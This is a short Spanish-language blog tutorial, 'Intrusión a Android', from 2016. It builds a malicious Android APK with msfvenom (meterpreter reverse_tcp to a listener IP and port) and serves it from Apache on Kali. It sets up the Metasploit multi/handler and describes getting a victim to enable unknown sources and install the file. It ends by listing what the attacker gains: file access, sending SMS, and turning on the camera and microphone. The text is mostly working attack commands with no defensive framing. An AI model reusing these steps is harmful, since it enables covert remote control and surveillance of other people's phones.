viernes, 19 de febrero de 2016

Intrusión a Android

En esta ocasión, vamos a hacer un PAYLOAD para Android.

Miramos a ver qué IP tenemos:

ifconfig



generamos el payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R > payload.apk




Para pasarlo a Android, voy a utilizar el servidor apache de Kali:

cp payload.apk /var/www/

service apache2 start

Iniciamos Metasploit:

msfconsole





use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 192.168.1.134

set LPORT 4444

exploit



Descargamos el archivo en nuestro dispositivo Android:



Pinchamos para instalar



Si nos sale:



Pinchamos a Configuración



Marcamos “Orígenes Desconocidos”


Vamos a la parte de descargas:




Pulsamos Siguiente e Instalar.




La víctima lo ejecuta

Y ya tenemos la sesión de meterpreter:


Y ya podemos navegar por los archivos, mandar SMS, activar la cámara, activar el micrófono, etc.



No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.